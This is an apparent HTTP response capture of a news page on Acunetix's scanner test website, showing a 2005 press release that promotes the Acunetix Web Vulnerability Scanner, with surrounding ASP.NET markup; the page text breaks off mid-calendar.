Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 